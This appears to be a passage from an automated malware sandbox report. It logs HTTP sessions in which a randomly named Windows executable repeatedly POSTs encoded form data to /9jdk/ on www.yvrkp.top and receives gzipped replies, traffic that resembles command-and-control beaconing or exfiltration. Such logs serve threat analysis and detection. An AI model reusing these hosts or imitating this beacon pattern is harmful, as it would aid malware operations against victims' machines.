                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 74 61 3d 6e 46 79 70 75 44 74 68 6f 6c 46 26 6d 46 70 74 59 62 3d 39 6b 78 45 59 63 50 4f 30 51 65 33 31 4d 6a 41 46 6a 49 63 57 4f 6e 63 73 48 32 35 63 46 68 4a 66 4f 53 56 6e 53 59 63 46 43 52 75 38 50 38 49 31 36 62 6e 76 46 75 72 76 51 68 67 49 45 30 4b 69 38 39 6e 53 69 53 79 2b 61 30 52 6c 4d 53 68 33 2b 56 59 45 5a 45 35 2f 41 31 41 6f 54 4e 6a 35 54 39 53 37 2b 35 31 76 70 6b 46 6f 69 70 35 54 77 6e 64 34 57 56 49 72 58 6c 33 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vta=nFypuDtholF&mFptYb=9kxEYcPO0Qe31MjAFjIcWOncsH25cFhJfOSVnSYcFCRu8P8I16bnvFurvQhgIE0Ki89nSiSy+a0RlMSh3+VYEZE5/A1AoTNj5T9S7+51vpkFoip5Twnd4WVIrXl3"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.2249179104.21.14.18380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:17.573620081 CET2472OUTPOST /9jdk/ HTTP/1.1
                                                                                                                            Host: www.yvrkp.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.yvrkp.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.yvrkp.top/9jdk/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 4f 56 34 79 7a 37 7a 6c 6e 6c 42 6d 75 2b 52 5a 52 30 37 43 67 47 33 31 38 30 43 31 72 2f 72 76 65 6d 44 2b 53 33 49 43 69 2b 57 65 36 66 56 38 7a 45 35 73 36 58 54 59 30 64 73 56 70 50 66 54 2b 4c 78 75 59 34 31 44 31 77 35 64 4e 62 62 50 4f 4b 34 65 64 76 44 77 2f 43 73 6c 49 4e 62 55 58 6d 45 6e 57 55 42 6e 68 58 33 71 34 59 4f 62 7a 75 57 58 42 50 4a 75 39 71 37 58 69 41 2f 2b 45 7a 2f 35 75 67 48 4b 6d 68 47 45 70 54 6f 62 62 33 39 6c 47 6d 66 4a 49 62 70 50 6e 69 2b 30 77 35 62 52 72 50 33 58 66 6f 4d 53 37 41 53 74 50 46 55 6e 74 6e 48 66 31 6a 69 7a 73 4a 71 43 6c 6c 5a 77 38 65 73 76 66 67 47 33 45 36 42 34 6f 76 4a 77 58 57 71 2f 6a 51 2f 37 6e 61 70 45 4e 36 39 4f 2b 7a 59 6e 61 72 65 4a 4e 48 6e 4b 7a 4b 46 6d 62 4f 59 79 74 61 70 34 70 57 4b 7a 33 32 47 6b 5a 62 30 4a 67 76 52 5a 73 2f 34 72 4b 73 54 78 51 52 36 30 4a 6b 37 6b 5a 34 78 56 2f 45 66 4b 57 55 50 2b 34 76 51 57 6a 57 31 6f 2b 62 46 62 6c 53 45 55 56 32 6c 37 63 6f [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=bszTw8BK2bGMUOV4yz7zlnlBmu+RZR07CgG3180C1r/rvemD+S3ICi+We6fV8zE5s6XTY0dsVpPfT+LxuY41D1w5dNbbPOK4edvDw/CslINbUXmEnWUBnhX3q4YObzuWXBPJu9q7XiA/+Ez/5ugHKmhGEpTobb39lGmfJIbpPni+0w5bRrP3XfoMS7AStPFUntnHf1jizsJqCllZw8esvfgG3E6B4ovJwXWq/jQ/7napEN69O+zYnareJNHnKzKFmbOYytap4pWKz32GkZb0JgvRZs/4rKsTxQR60Jk7kZ4xV/EfKWUP+4vQWjW1o+bFblSEUV2l7coYzLTMhwRgvhU2EjU/ELFBeVi8fchmV26ol1HKIaGgNUA3mqskG6dT8Merrt/sizBaIMbAJiz5PUicJhP1nYp5ebg754lKW7opWtjLKCLTFAMVoG0m6oJTGJlS7/sgRm7HEtmBVb+hntajzLAeCCOkVEwYADG8i8nQb4X9gukAHjb7/TopB8zKHBJucktgdLMUDMaLnsJgsp2eJ2L4I6jMLw8yMvpAPaVi5TUNo4CAqMstmjjsWTWBVXrqV+Abip6/98IgK3yVzVZRSS2DYCjmYUfU2KWaYy//x+oBWR4KYkGWk3mtoO0R8w/FEIkNyiP+/5aRq4mImcmEgS4+9ABV8L9HpmhIqjyL5u31h9h5qWMzSop9lgIcMyUoaCbkMcsnYEepjosQe02weHRRWaxApym0oNCT1CPhIQIHlErmPUDl3+NTqtcCTaRAnnIrGTdJVrh0zf+veujQr5jfU4HJHUN6ZXZEmalirplbGly4Rn86FRikcHAwWvGnms/KhMgveKR9r2cTchHgSd2nN83zu5qLc37TvKxVBaJNPFRYNy4RY1RW7dtXT/8kxfAOPXeviPeKLs14w8/rekRuizUZa9xzSRKJFIaa/BjnsGAnXulmNGpQZpFiM3x9am0x65LaH90h/xYxw7ACSdo5ErhbT1z5ksvG7q3iS [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:17.578603983 CET270OUTData Raw: 6b 52 65 43 68 6e 72 65 79 36 2f 75 6a 4b 5a 78 75 36 77 58 62 32 41 32 6a 4a 57 76 34 33 37 4d 61 5a 38 68 48 65 61 49 53 45 32 2b 34 33 4d 6b 6a 37 75 37 48 56 56 6a 37 56 6b 76 39 78 34 56 4b 49 35 67 6b 76 48 64 74 36 4d 77 53 43 77 71 51 7a
                                                                                                                            Data Ascii: kReChnrey6/ujKZxu6wXb2A2jJWv437MaZ8hHeaISE2+43Mkj7u7HVVj7Vkv9x4VKI5gkvHdt6MwSCwqQz7lKTaGjQqlDJ4CU+gewhjKKOkumI5B+TXR9tntFAYlSO/2/1xKzLqDozI8j2IUisHE2CtzDOG1Ou8dESNMYrmkDjjoAP9H7nAnGlSiGM3VW9Qk7qb053BEjtLokig2+Z/yHvnPUO61o9xXqcmJnHGqfEhWNdjgerI


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.2249180104.21.14.18380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:20.123925924 CET781OUTPOST /9jdk/ HTTP/1.1
                                                                                                                            Host: www.yvrkp.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.yvrkp.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.yvrkp.top/9jdk/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 4a 4a 34 77 6e 58 7a 6b 48 6c 42 68 75 2b 52 53 78 30 35 43 67 4b 56 31 35 4e 46 31 38 44 72 75 4f 57 44 2b 67 50 49 48 69 2b 56 52 61 66 52 78 54 45 57 73 36 57 74 59 77 64 73 56 70 72 66 52 63 6a 78 6f 63 4d 30 63 31 77 37 56 74 62 59 50 4f 57 4c 65 64 6a 54 77 38 43 73 6c 50 70 62 4f 58 32 45 78 6a 41 42 69 52 58 39 2f 6f 59 56 62 7a 79 35 58 42 65 45 75 2b 2b 37 58 7a 63 2f 2b 57 4c 2f 76 76 67 48 44 47 68 48 4b 4a 53 67 54 70 71 74 38 48 53 47 56 75 62 4c 4f 53 47 38 30 68 63 63 52 36 4c 39 54 4f 6b 6b 54 75 56 6a 6b 64 55 47 79 51 3d 3d
                                                                                                                            Data Ascii: mFptYb=bszTw8BK2bGMUJJ4wnXzkHlBhu+RSx05CgKV15NF18DruOWD+gPIHi+VRafRxTEWs6WtYwdsVprfRcjxocM0c1w7VtbYPOWLedjTw8CslPpbOX2ExjABiRX9/oYVbzy5XBeEu++7Xzc/+WL/vvgHDGhHKJSgTpqt8HSGVubLOSG80hccR6L9TOkkTuVjkdUGyQ==
                                                                                                                            Nov 7, 2024 10:51:21.305032969 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:21 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: private
                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8eBK4z9r%2Bd8G8PCiwNNZJJKhvEkz3fi%2FJyc0HTFXyeXrntG0J9Sbnakh8QLpbsoN2tplofd7bI4kVK80VMHwE3X0foyOVTYQDVkN9vs%2BzNLiEpHQaGDAXkHv3Vdx1vO4"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8dec6c9a0f2ae5ad-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=781&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 35 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf 9c 94 33 1c a7 52 19 67 d2 98 45 26 ee 45 98 b3 10
                                                                                                                            Data Ascii: 57bXMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R|mKaP7I#a%aJEo=-sN!@uXjt/d,U3RgE&E
                                                                                                                            Nov 7, 2024 10:51:21.305087090 CET1156INData Raw: 69 f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42 9a 2e ae 25 91 7d c6 91 8e b1 4f 21 4d 69 08 29 d4
                                                                                                                            Data Ascii: i!a8+O|{]|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l|?Vtq|Em:p&FD!yj:F41}jX
                                                                                                                            Nov 7, 2024 10:51:21.500977039 CET1236INData Raw: 36 37 65 0d 0a dc 5b d9 53 13 49 18 7f b7 ca ff 61 2a de ec 0e e9 23 3d 47 70 79 d9 87 7d 5a 6b 1f d8 27 cb a2 26 3d 93 25 1a 48 2a 87 85 0f 5b 25 a0 2c 78 94 0a e8 16 87 a5 8b a8 78 80 42 b9 20 25 b8 ff cc ce f5 e4 bf b0 35 47 4f 7a 42 54 24 62
                                                                                                                            Data Ascii: 67e[SIa*#=Gpy}Zk'&=%H*[%,xxB %5GOzBT$b%Lz{~_;3w0Q/_n[3+Ru[7g{^4TOMq4'z4Z.WW:\2"KAgH@(!@C$A PA&04=
                                                                                                                            Nov 7, 2024 10:51:21.500998020 CET433INData Raw: 3a 2f 55 51 a4 d6 23 a1 a4 10 94 88 aa 92 e6 90 78 77 c7 9d 7f 6e be dd e9 4c 24 54 80 5a 84 04 62 48 20 08 88 0a 00 52 90 d2 14 12 ee fc ac 33 b9 6e 2f 6c 9b 3b 6b f6 fc 52 87 ae 0c 19 b5 7e 65 c8 18 60 09 ab b0 39 1f e5 4e 3c 71 af 6f 5b 13 53
                                                                                                                            Data Ascii: :/UQ#xwnL$TZbH R3n/l;kR~e`9N<qo[S?6@FMAA7wj}zyA[-Pj.,,usqbOf4:@`T%EZ@cL\3=pvG9A)* _^?2zy<W


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.2249181104.21.14.18380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:22.664246082 CET2472OUTPOST /9jdk/ HTTP/1.1
                                                                                                                            Host: www.yvrkp.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.yvrkp.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.yvrkp.top/9jdk/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 70 35 34 31 41 44 7a 7a 33 6c 41 71 4f 2b 52 5a 52 30 39 43 67 47 56 31 38 30 43 31 76 76 72 76 64 75 44 2b 43 33 49 46 69 2b 56 58 61 66 56 38 7a 45 2b 73 36 44 44 59 31 68 57 56 72 6e 66 54 37 2f 78 75 66 6b 31 45 31 77 35 52 74 62 5a 50 4f 57 65 65 64 7a 66 77 38 32 4b 6c 50 68 62 53 31 65 45 6d 6a 41 47 74 78 58 39 2f 6f 59 6a 62 7a 79 46 58 42 48 5a 75 2f 6d 72 58 6c 77 2f 2f 30 7a 2f 74 4f 67 47 46 47 68 44 41 70 54 32 62 62 37 45 6c 47 6d 62 4a 49 6e 54 50 67 71 2b 30 6d 31 62 52 73 54 30 59 76 6f 54 4d 4c 41 53 77 66 46 4b 6e 74 6e 62 66 31 6a 69 7a 73 46 71 41 31 6c 5a 77 2b 32 76 78 76 67 47 70 55 36 63 32 49 53 36 77 55 72 6d 2f 6a 67 46 34 51 71 70 57 59 4f 39 4a 4f 7a 59 68 71 72 69 4a 4e 48 51 64 6a 4b 33 6d 61 71 51 79 74 4b 35 34 70 57 4b 7a 30 2b 47 31 37 44 30 4f 77 76 52 47 38 2f 35 69 71 73 53 78 54 39 55 30 4a 67 37 6b 59 77 78 50 74 63 66 64 6b 38 4d 30 6f 76 52 53 6a 57 33 73 2b 61 52 62 6d 32 71 55 56 2b 62 37 64 59 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=bszTw8BK2bGMUp541ADzz3lAqO+RZR09CgGV180C1vvrvduD+C3IFi+VXafV8zE+s6DDY1hWVrnfT7/xufk1E1w5RtbZPOWeedzfw82KlPhbS1eEmjAGtxX9/oYjbzyFXBHZu/mrXlw//0z/tOgGFGhDApT2bb7ElGmbJInTPgq+0m1bRsT0YvoTMLASwfFKntnbf1jizsFqA1lZw+2vxvgGpU6c2IS6wUrm/jgF4QqpWYO9JOzYhqriJNHQdjK3maqQytK54pWKz0+G17D0OwvRG8/5iqsSxT9U0Jg7kYwxPtcfdk8M0ovRSjW3s+aRbm2qUV+b7dYYzNHMt1xgvRU5DjUzALIVeWCBfa92V1+okkHKJfzSTUA92asUXqdh8KCRrtfsihhaGs7ADFn2f0ifDBPcu4pteb1k56daVOUpXdjLIgzQJwMQvG0w0IIKGJlg76gWRU7HEsWBVJmhntag5rAYLizeVE0cADasi+PQboH9gqwAJjb74TpjPcz+HC1YchZwBrYUGdqLgaVg552cP2L5GajdLwMyMucdPepi4xsNn6qA/csp6zj3WTX4VWf2V+wlisi/9+ggdmyV0VZqQS2HVijdYUXE2JSwYzn/3YYBZDQKYEGQtXmthu0380rVEKR2ygv+/KSR/ImLr8mFsy4h3gBh8LtHpmlIqlKL5/31mO55pmMxWopd3gEsMxsCaDv0McMnb1eprKEfRk2ybHRbAqxkpymwoPy51TvhIEcHjhLhDUDo5eMR3dc2TaBqnnM7GkNJVrR0zMavZejQr5jYU4GOHUxAZWpumalip4lbGXq4ZH8jHRi/L3A6WvCRms3shMMvMrx9r2dhRxHjb924N8yRu5qlc3nTv49VBLpNWgFYdC4ROFRXx9tWT/80xbZDPV2vj/+KKudnyM/qYkQr5jY8a9N7STGJFaOauAjnt2AnaullCmpFGZ47M3tHajZp6L/aFO8h9ygy4rA5Wdo/Ert4T1rhktXw7p3iT [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:22.672544956 CET1734OUTData Raw: 6b 58 65 43 35 46 72 62 36 71 2f 73 72 4b 57 79 6d 36 78 47 62 32 63 32 6a 50 57 76 34 71 32 73 66 6e 38 68 47 6e 61 49 6d 45 32 2b 6f 33 4d 6e 72 37 70 4c 48 55 64 7a 37 51 2b 2f 39 79 7a 31 4b 55 35 67 6b 64 48 63 52 63 4d 77 6d 43 77 5a 6f 7a
                                                                                                                            Data Ascii: kXeC5Frb6q/srKWym6xGb2c2jPWv4q2sfn8hGnaImE2+o3Mnr7pLHUdz7Q+/9yz1KU5gkdHcRcMwmCwZozy3iTb2jS91DWyiphges1jP3xkc+I6SKTcCVtjNFBblST/2yqxKi1qBQVINf2JkisQWvwpzDIB1Pu8dFPNMgvmgPJjpIP9BvnP3GkCCGG0VX7Qk/Pb3YWBETtLpIigVWZvCHvuvUP0Vp7snmfmK3fR8zij21pthW7O
                                                                                                                            Nov 7, 2024 10:51:23.811223030 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:23 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: private
                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hl9LqMUWiRc%2F%2BqBgVDKgXK9z3uStNxzZqaFUs3Uq6tIQqc3HqkCizXVL%2FMsPTPDHOgAfRz2X4OXDPXSPenWF7h8RqdypxIPMO44usVyoaPLfIK1kGAO%2Bzn5n1UDoQfl%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8dec6ca9ed276b0a-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4206&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 35 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf 9c 94 33 1c a7 52 19 67 d2 98 45
                                                                                                                            Data Ascii: 57bXMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R|mKaP7I#a%aJEo=-sN!@uXjt/d,U3RgE
                                                                                                                            Nov 7, 2024 10:51:23.811250925 CET1162INData Raw: 26 ee 45 98 b3 10 69 f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42 9a 2e ae 25 91 7d c6 91 8e b1 4f
                                                                                                                            Data Ascii: &Ei!a8+O|{]|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l|?Vtq|Em:p&FD!yj:F41}
                                                                                                                            Nov 7, 2024 10:51:24.004609108 CET1236INData Raw: 36 37 36 0d 0a dc 5b cd 73 d3 46 14 bf 33 c3 ff e0 31 df 69 15 ed ae a4 95 e4 50 5f 7a e8 a9 4c 0f e9 89 61 3c b2 3e 1a 83 13 7b 2c 9b 09 87 ce 24 4d 93 09 65 68 4a 20 7c 84 d0 21 94 29 30 01 43 68 9a 84 09 86 7f 26 b2 ec 13 ff 42 47 d2 ae bc b2
                                                                                                                            Data Ascii: 676[sF31iP_zLa<>{,$MehJ |!)0Ch&BG!v~}kXNMouK6>vh<{P=i9f%t9_Z(\T(w-,`#,H,5`80ne2
                                                                                                                            Nov 7, 2024 10:51:24.004646063 CET425INData Raw: 0c fa 80 04 50 79 a8 92 16 54 21 10 65 20 a9 0a 8e 87 84 bb f2 da a9 ad d7 ff 5a ec 11 09 b0 07 0e 9f d1 1d c4 03 e0 0e a2 24 43 01 2a 08 c7 03 61 ed 95 fb 7c ca fd 7d c7 5d 9c a9 df 7b 3e a0 e1 09 0a 07 20 3c 01 04 44 0c 62 2e dc f5 ed d9 fa c6
                                                                                                                            Data Ascii: PyT!e Z$C*a|}]{> <Db.-g~k@PPf@Yl=<'"O@!cBCW7O:W^|&/^U%J\]mN-;/+K'v@cVQ/v9w


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.2249182104.21.14.18380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:25.199760914 CET527OUTGET /9jdk/?mFptYb=WubzzLgyg7H8FuUk5jz2rAc/vuKAZBsVZD6HlZkF1Lv4/cTJ30fLMnj/fJn75AU89YfOY1B4b6fbf9/30+RUdxRnQcqHHPG8fsTR2djr0+RxMWff6QI0kTzUoO97&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.yvrkp.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:51:26.416253090 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:26 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: private
                                                                                                                            X-AspNet-Version: 4.0.30319
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JB0dokdK71Hstt1sonvW2MTED9boFAhLrpEYP7LINJR2SPA7DsTa4ofhX6AljAoL6thG1SNEU%2BAkgFyc%2BFOTBzrzL6Jc%2BvLWW4WXFNA%2BG4cD1kM3IptNp%2BCArtAZHfak"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8dec6cb9df25486e-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1680&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=527&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 31 33 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6a 73 20 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65
                                                                                                                            Data Ascii: 130d<!DOCTYPE html><html class="js cssanimations"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="description" content=""> <meta name="keywords" content=""> <me
